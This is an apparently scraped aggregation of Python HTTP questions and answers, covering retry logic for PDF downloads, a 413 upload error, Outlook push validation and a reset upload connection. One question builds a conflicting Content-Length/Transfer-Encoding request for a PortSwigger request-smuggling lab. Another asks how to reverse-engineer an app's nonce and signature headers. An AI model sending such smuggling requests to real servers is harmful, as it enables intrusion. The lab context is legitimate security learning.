I am requesting pdf binary content from a Tomcat Webserice from a Python Web Application Server.
We have implemented a 2 times retry like this in Python. Once in a while we get an HTTP 500 Response. This issue is being investigated however it is very likely to be an environment issue related to insufficient resources like maximum no: of process reached etc. In the next retry, more often than not, we get an HTTP 200 with partial blob content (i.e with EOF Marker in PDF). How is that possible?
Is there any flaws in this retry logic? How can HTTP 200 response have incomplete data is beyond my understanding. Is the HTTP 200 sent first and then the real data (which means there is a possibility of server dying after it sent HTTP 200)? The only other explanation is that server is sending the entire content but the program that is generating the data is sending incomplete data due to some resource issues which might have also caused HTTP 500.
# There is a unique id as well to make it new request. (retries is 2 by default)
while retries:
try:
req = urllib2.Request(url, data=input_html)
req.add_header('Accept', 'application/pdf')
req.add_header('Content-Type', 'text/html')
handle = urllib2.urlopen(req)
pdf_blob = handle.read()
except:
log(traceback)
retries = retries - 1
if not retries:
raise
Architecture is as follows:
Web Application -> Calls Tomcat -> Gets PDF -> Stores To DB.
Related
I try to write a python script containing a somewhat unusual HTTP request as part of learning about web attacks and solving the lab at
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te.
There, I need to issue a request containing both a Content-Length and a Transfer-Encoding header that are in disagreement.
My basic and still unmanipulated request looks like this and works as expected:
with requests.Session() as client:
client.verify = False
client.proxies = proxies
[...]
data = '0\r\n\r\nX'
req = requests.Request('POST', host, data=data)
prep = client.prepare_request(req)
client.send(prep)
[...]
Content-Length: 6\r\n
\r\n
0\r\n
\r\n
X
However, as soon as I add the Transfer-Encoding header, the request itself gets modified.
data = '0\r\n\r\nX'
req = requests.Request('POST', host, data=data)
prep = client.prepare_request(req)
prep.headers['Transfer-Encoding'] = 'chunked'
client.send(prep)
The request that is actually send down the wire is
[...]
Content-Length: 0\r\n
\r\n
whereas the expected request would be
[...]
Content-Length: 6\r\n
Transfer-Encoding: chunked\r\n
\r\n
0\r\n
\r\n
X
The same thing happens if I flip things around, prepare a chunked request and modify the Content-Length header afterwards:
def gen():
yield b'0\r\n'
yield b'\r\n'
yield b'X'
req = requests.Request('POST', host, data=gen())
prep = client.prepare_request(req)
prep.headers['Content-Length'] = '6'
client.send(prep)
Basically, the Transfer-Encoding header gets removed completely, the data is reinterpreted according to the chunking and the Content-Length header gets recalculated to match.
I was under the impression that preparing a request and manipulating its content before sending should send the modified content, but either this is a wrong assumption or I do things horribly wrong.
Is sending such a request possible this way or do I have to go onto a lower level to put arbitrary data on the wire?
requests is a good HTTP client, and as such will prevent you from generating bad HTTP queries. As writing bad HTTP queries will result in 400 errors in a lot of cases.
To generate syntax errors in HTTP queries you need to avoid using high level http clients (like a browser, but also like an http library). Instead you need togo down to the tcp/ip socket management (and maybe ssl also) and start writing the full HTTP protocol with your own code, no library.
I am trying to automate a web based analysis that requires two input files and DNA sequence string as input.
I have a lot of files and DNA sequence that I would like to analyze.
If I manually fill in the form on the website, it nicely work.
However, if I used the following script, it gives "413 Request Entity Too Large" error message.
How can I overcome this?
import requests
import gzip
url = "http://www.rgenome.net/cas-analyzer/#!"
s = requests.session()
r1 = s.get(url)
print(r1.cookies)
csrf_token = r1.cookies['csrftoken']
R1 = gzip.open("R1_001.fastq.gz", 'rt')
R2 = gzip.open("R2_001.fastq.gz", 'rt')
data = {'csrfmiddlewaretoken': csrf_token, 'file1': R1, 'file2': R2, 'fullseq': "atggccggttaaggttaaagg", 'rgneweq': 'atgccat'}
r2 = s.post(url=url, data=data, headers={'Content-Type': 'application/x-www-form-urlencoded'})
print(r2)
print(r2.text)
R1.close()
R2.close()
I have try this.
R1 = open("R1_001.fastq.gz", 'rb')
R2 = open("R2_001.fastq.gz", 'rb')
But it doesn't make any difference.
The server is not under my control. Funny thing is that I can do it manually on the webpage but I can not use the script
A 413 Request Entity Too Large error occurs when a request made from a client is too large to be processed by the web server.
If your web server is setting a particular HTTP request size limit, clients may come across a 413 Request Entity Too Large response. in this this case uploading a large file.
if you are the one controlling webserver you might want to adjust the params in webserver config.
Sample Example
NGINX
server {
client_max_body_size 100M;
...
}
APACHE
LimitRequestBody 104857600
I captured this https request from my Android phone.
GET https://picaapi.picacomic.com/init?platform=android HTTP/1.1
accept: application/vnd.picacomic.com.v1+json
time: 1579258278
nonce: b4cf4158c0da4a70b4b7e58a0b0b5a55
signature: 65448a52a6d19ceecf21d249ae25e564b61425b4d371f6a20fb4fcbbb9131d9d
app-version: 2.2.1.3.3.4
After replaying it in Fiddler for several times, it became obvious that the site checks these two values,'nonce' and 'signature', before giving a response, otherwise the response only contains an error code. Since I wanted to use this api to request for contents of the site, I need to know how these two values are encrypted.
According to microsoft Document I have to follow below steps:
If the listener service successfully validates the URL, it returns a
success response within 5 seconds as follows:
Sets the content type in the response header to text\plain.
Includes the same validation token in the response body.
Returns an HTTP 200 response code. The listener can discard the validation token subsequently.
My enpoint is look like this:
#app.route('/outlook/push', methods=['POST'])
def outlook_push():
return (request.args.get('validationtoken'), 200, {'Content-Type': 'plain/text'})
but this exceeds the time limit(5s)
I am getting error like this:
{'error': {'code': 'ErrorInvalidParameter', 'message': "Notification URL 'https://5cbae04e.ngrok.io/outlook/push?validationtoken=NmIzZDJiMTMtZjhmNy00ZWMwLTg1MDctNDQwMDQ0OWM2NmE1' verification failed 'System.Net.WebException: The operation has timed out\r\n at System.Net.HttpWebRequest.GetResponse()\r\n at Microsoft.Exchange.OData.Model.Notifications.PushNotification.PushSubscriptionCallbackUrlValidationHelper.SendRequestAndVerifyResponse(Uri callbackUrl, PushSubscription pushSubscription)'."}}
Is there anyway to increase time limit?
I don't think it can be changed, and your problem probably is that your route is defined to accept POST method. And office365 is making GET request in there :)
I'm trying to use the Python requests library to send an android .apk file to a API service. I've successfully used requests and this file type to submit to another service but I keep getting a:
ConnectionError(MaxRetryError("HTTPSConnectionPool(host='REDACTED', port=443): Max retries exceeded with url: /upload/app (Caused by : [WinError 10054] An existing connection was forcibly closed by the remote host)",),)
This is the code responsible:
url = "https://website"
files = {'file': open(app, 'rb')}
headers = {'user':'value', 'pass':'value'}
try:
response = requests.post(url, files=files, headers=headers)
jsonResponse = json.loads(response.text)
if 'error' in jsonResponse:
logger.error(jsonResponse['error'])
except Exception as e:
logger.error("Exception when trying to upload app to host")
The response line is throwing the above mentioned exception. I've used these exact same parameters using the Chrome Postman extension to replicate the POST request and it works perfectly. I've used the exact same format of file to upload to another RESTful service as well. The only difference between this request and the one that works is that this one has custom headers attached in order to verify the POST. The API doesn't stipulate this as authentication in the sense of needing to be encoded and the examples both in HTTP and cURL define these values as headers or -H.
Any help would be most appreciated!
So this was indeed a certificates issue. In my case I was able to stay internal to my company and connect to another URL, but the requests library, which is quite amazing, has information on certs at: http://docs.python-requests.org/en/latest/user/advanced/?highlight=certs
For all intents and purposes this is answered but perhaps it will be useful to someone in posterity.